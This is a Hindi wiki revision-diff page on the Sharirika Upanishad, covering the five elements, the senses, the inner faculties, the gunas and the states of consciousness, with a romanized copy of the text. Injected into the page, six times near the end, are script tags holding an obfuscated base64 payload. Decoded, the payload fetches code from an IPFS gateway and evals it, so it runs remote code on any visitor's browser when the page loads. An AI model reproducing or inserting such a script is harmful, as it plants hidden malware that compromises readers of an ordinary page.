Difference between revisions of "शारीरिकोपनिषद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(10 intermediate revisions by 6 users not shown)
Line 1: Line 1:
==शारीरिकोपनिषद==
 
 
{{tocright}}
 
{{tocright}}
कृष्ण [[यजुर्वेद]] से सम्बन्धित यह [[उपनिषद]] सृष्टि-प्रक्रिया का विशद वर्णन करता है। शरीर में विद्यमान पंचतत्त्वों का इसमें परिचय दिया गया है तथा शरीर स्थित सभी इन्द्रियों से परिचित कराया गया है। शरीर में अन्त:करण के चार बिन्दु कहां पर स्थित हैं तथा अनेकानेक तत्त्वों का विवेचन भी इस उपनिषद में किया गया है। 'तत्त्वबोध' की दृष्टि से इस उपनिषद का विशेष महत्त्व है। इसमें कुल बीस मन्त्र हैं।  
+
कृष्ण [[यजुर्वेद]] से सम्बन्धित यह [[उपनिषद]] सृष्टि-प्रक्रिया का विशद वर्णन करता है। शरीर में विद्यमान [[पंचतत्त्व|पंचतत्त्वों]] का इसमें परिचय दिया गया है तथा शरीर स्थित सभी इन्द्रियों से परिचित कराया गया है। शरीर में अन्त:करण के चार बिन्दु कहां पर स्थित हैं तथा अनेकानेक तत्त्वों का विवेचन भी इस उपनिषद में किया गया है। 'तत्त्वबोध' की दृष्टि से इस उपनिषद का विशेष महत्त्व है। इसमें कुल बीस मन्त्र हैं।  
 
==पंचमहाभूतों का समुच्चय==
 
==पंचमहाभूतों का समुच्चय==
हमारा यह शरीर पांच महाभूतों- [[पृथ्वी]], [[जल]], [[अग्नि]], [[वायु]] और [[आकाश]] का सन्तुलित समुच्चय है। इनका सन्तुलित मिश्रण ही शरीर का आकार ग्रहण करता है। इसमें छठा तत्त्व 'प्राण' है, जिससे यह जीवन्त हो उठता है। शरीर का ठोस पदार्थ पृथिवीतत्त्व है, द्रव्य पदार्थ-जलतत्त्व है, उष्मा- अग्नितत्त्व है, सतत गतिशील- वायुतत्त्व है और छिद्रयुक्त ख़ाली स्थान- आकाशतत्त्व है। ये पांचों तत्त्व 'प्राण' द्वारा ही सक्रिय हो पाते हैं। उससे पूर्व शरीर का कोई महत्त्व नहीं है।
+
हमारा यह शरीर पांच महाभूतों- [[पृथ्वी देवी|पृथ्वी]], [[जल]], [[अग्निदेव|अग्नि]], [[वायु देव|वायु]] और [[आकाश तत्व|आकाश]] का सन्तुलित समुच्चय है। इनका सन्तुलित मिश्रण ही शरीर का आकार ग्रहण करता है। इसमें छठा तत्त्व 'प्राण' है, जिससे यह जीवन्त हो उठता है। शरीर का ठोस पदार्थ पृथिवीतत्त्व है, द्रव्य पदार्थ-जलतत्त्व है, उष्मा- अग्नितत्त्व है, सतत गतिशील- वायुतत्त्व है और छिद्रयुक्त ख़ाली स्थान- आकाशतत्त्व है। ये पांचों तत्त्व 'प्राण' द्वारा ही सक्रिय हो पाते हैं। उससे पूर्व शरीर का कोई महत्त्व नहीं है।
  
 
==पांच ज्ञानेन्द्रियां==
 
==पांच ज्ञानेन्द्रियां==
आंख, कान, नाक, त्वचा और जिह्वा पांच ज्ञानेन्द्रियां हैं, जिनका संचालन 'मन' के द्वारा होता है।  
+
आंख, कान, नाक, त्वचा और [[जिह्वा]] पांच ज्ञानेन्द्रियां हैं, जिनका संचालन 'मन' के द्वारा होता है।  
 
==पांच कर्मोन्द्रियां==
 
==पांच कर्मोन्द्रियां==
 
वाणी, हाथ, पैर, गुदा और उपस्थ (जननेन्द्रिय) पांच ही कर्मेन्दियां हैं। इनका संचालन भी 'मन' द्वारा होता है।  
 
वाणी, हाथ, पैर, गुदा और उपस्थ (जननेन्द्रिय) पांच ही कर्मेन्दियां हैं। इनका संचालन भी 'मन' द्वारा होता है।  
Line 12: Line 11:
 
'मन,' 'बुद्धि, 'चित्त' (हृदय) और 'अहंकार, 'ये चार अन्त:करण बिन्दु कहे गये हैं। मन के द्वारा संकल्प-विकल्प किया जाता है। बुद्धि द्वारा निश्चय किया जाता है, चित्त द्वारा अवधारणा और अहंकार द्वारा अभिमान प्रकट किया जाता है। मन का स्थान गले का ऊपरी भाग, बुद्धि का स्थान मुख, चित्त का स्थान नाभि और अहंकार का स्थान हृदय है।  
 
'मन,' 'बुद्धि, 'चित्त' (हृदय) और 'अहंकार, 'ये चार अन्त:करण बिन्दु कहे गये हैं। मन के द्वारा संकल्प-विकल्प किया जाता है। बुद्धि द्वारा निश्चय किया जाता है, चित्त द्वारा अवधारणा और अहंकार द्वारा अभिमान प्रकट किया जाता है। मन का स्थान गले का ऊपरी भाग, बुद्धि का स्थान मुख, चित्त का स्थान नाभि और अहंकार का स्थान हृदय है।  
 
==पंचमहाभूतों के अंश और गुण==
 
==पंचमहाभूतों के अंश और गुण==
#अस्ति, त्वचा, नाड़ी, रोम कूप तथा मांस [[पृथ्वी]] तत्त्व के अंश और शब्द, स्पर्श, रूप, रस और गन्ध गुण हैं।  
+
#अस्ति, त्वचा, नाड़ी, रोम कूप तथा मांस [[पृथ्वी देवी|पृथ्वी]] तत्त्व के अंश और शब्द, स्पर्श, रूप, रस और गन्ध गुण हैं।  
 
#मूत्र, कफ, रक्त, शुक्राणु तथा श्वेद (पसीना) जल तत्त्व के अंश हैं और शब्द, स्पर्श, रूप और रस गुण हैं।  
 
#मूत्र, कफ, रक्त, शुक्राणु तथा श्वेद (पसीना) जल तत्त्व के अंश हैं और शब्द, स्पर्श, रूप और रस गुण हैं।  
 
#क्षुधा (भूख), पिपासा (प्यास), आलस्य, मोह और मैथुन अग्नि तत्त्व के अंश हैं और शब्द, स्पर्श और रूप, ये तीन गुण हैं।  
 
#क्षुधा (भूख), पिपासा (प्यास), आलस्य, मोह और मैथुन अग्नि तत्त्व के अंश हैं और शब्द, स्पर्श और रूप, ये तीन गुण हैं।  
Line 39: Line 38:
 
<br />
 
<br />
  
==उपनिषद के अन्य लिंक==
+
==संबंधित लेख==
{{उपनिषद}}
+
{{संस्कृत साहित्य}}
 
{{कृष्ण यजुर्वेदीय उपनिषद}}
 
{{कृष्ण यजुर्वेदीय उपनिषद}}
 
[[Category:दर्शन कोश]]
 
[[Category:दर्शन कोश]]
[[Category:उपनिषद]]
+
[[Category:उपनिषद]][[Category:संस्कृत साहित्य]]
 
   
 
   
 
__INDEX__
 
__INDEX__

Latest revision as of 13:45, 13 October 2011

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

krishna yajurved se sambandhit yah upanishad srishti-prakriya ka vishad varnan karata hai. sharir mean vidyaman panchatattvoan ka isamean parichay diya gaya hai tatha sharir sthit sabhi indriyoan se parichit karaya gaya hai. sharir mean ant:karan ke char bindu kahaan par sthit haian tatha anekanek tattvoan ka vivechan bhi is upanishad mean kiya gaya hai. 'tattvabodh' ki drishti se is upanishad ka vishesh mahattv hai. isamean kul bis mantr haian.

panchamahabhootoan ka samuchchay

hamara yah sharir paanch mahabhootoan- prithvi, jal, agni, vayu aur akash ka santulit samuchchay hai. inaka santulit mishran hi sharir ka akar grahan karata hai. isamean chhatha tattv 'pran' hai, jisase yah jivant ho uthata hai. sharir ka thos padarth prithivitattv hai, dravy padarth-jalatattv hai, ushma- agnitattv hai, satat gatishil- vayutattv hai aur chhidrayukt khali sthan- akashatattv hai. ye paanchoan tattv 'pran' dvara hi sakriy ho pate haian. usase poorv sharir ka koee mahattv nahian hai.

paanch jnanendriyaan

aankh, kan, nak, tvacha aur jihva paanch jnanendriyaan haian, jinaka sanchalan 'man' ke dvara hota hai.

paanch karmondriyaan

vani, hath, pair, guda aur upasth (jananendriy) paanch hi karmendiyaan haian. inaka sanchalan bhi 'man' dvara hota hai.

char ant:karan bindu

'man,' 'buddhi, 'chitt' (hriday) aur 'ahankar, 'ye char ant:karan bindu kahe gaye haian. man ke dvara sankalp-vikalp kiya jata hai. buddhi dvara nishchay kiya jata hai, chitt dvara avadharana aur ahankar dvara abhiman prakat kiya jata hai. man ka sthan gale ka oopari bhag, buddhi ka sthan mukh, chitt ka sthan nabhi aur ahankar ka sthan hriday hai.

panchamahabhootoan ke aansh aur gun

  1. asti, tvacha, na di, rom koop tatha maans prithvi tattv ke aansh aur shabd, sparsh, roop, ras aur gandh gun haian.
  2. mootr, kaph, rakt, shukranu tatha shved (pasina) jal tattv ke aansh haian aur shabd, sparsh, roop aur ras gun haian.
  3. kshudha (bhookh), pipasa (pyas), alasy, moh aur maithun agni tattv ke aansh haian aur shabd, sparsh aur roop, ye tin gun haian.
  4. phailana, dau dana, gati, u dana, palakoan adi ka sanchalan vayu tattv ke aansh haian aur shabd tatha sparsh gun haian.
  5. kam, krodh, lobh, moh aur bhay adi akash tattv ke aansh haian aur 'shabd' ekamatr gun hai.

tin gun kaun se haian?

'satvik', 'rajasik' tatha 'tamasik' tin gun haian.

  • 'satvik' gunoan mean, ahiansa, saty, astey (chori n karana), brahmachary, aparigrah, krodh n karana, guru ki seva, shuchita, santosh, saralata, sanvedana, dambh n karana, astikata adi gun ate haian.
  • 'rajasik' gunoan mean, bhog-vilas ki pravritti, shakti-mad, vani-mad, vaibhav-lalasa adi gun ate haian.
  • 'tamasik' gunoan mean, nidra, alasy, moh, asakti, maithun, chori karana, hiansa karana, satana adi karm ate haian.

sarvashreshth gun 'satvik' hi mane gaye haian. 'brahmajnan' satvik mana jata hai. 'dharmajnan' rajasik pravritti mani jati hai aur 'ajnan' tamasi pravritti ka dyotam hai.

char avasthaean

  1. 'jagrat', 'svapn','sushupti' aur 'turiy'- ye char avasthaean haian.
  2. 'jagrat' avastha mean jnanendriy, karmendriy tatha char ant:karan milakar chaudah karan (sakriy) rahate haian.
  3. 'svapnavastha' mean char ant:karan sanyukt roop se sakriy rahate haian.
  4. 'sushupti' avastha mean keval chit hi sakriy rahata hai.
  • 'turiyavastha' mean keval jivatma sakriy rahata hai.

sookshm sharir kya hai?

jnanendriy, karmendiy, paanch pran, man tatha buddhi, in satrah ka 'sookshm svaroop liang sharir' kaha gaya hai.

ath vikar kya haian?

man, buddhi, ahankar, akash, vayu, agni, jal aur prithvi, ye ath prakriti ke vikar kahe gaye haian.

any vikar kaun se haian?

uparyukt ath vikaroan ke atirikt pandrah any vikaroan mean –kan, tvacha, aankh, jihva, nak, guda, upasth (jananendriy), hath, pair, vani, shabd, sparsh, roop, ras aur gandh adi haian. inake sath uparyukt ath vikaroan ko milane se ye teees tattv ho jate haian. inase alag avyakt tattv 'prakriti' ka hai. usase bhi alag tattv 'purush' (brahm) ka hai. is prakar sabhi pachchis tattvoan ka yog ho jata hai. in pachchis tattvoan ke yog se hi samast brahmand ki rachana huee hai.

sanbandhit lekh

shrutiyaan
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>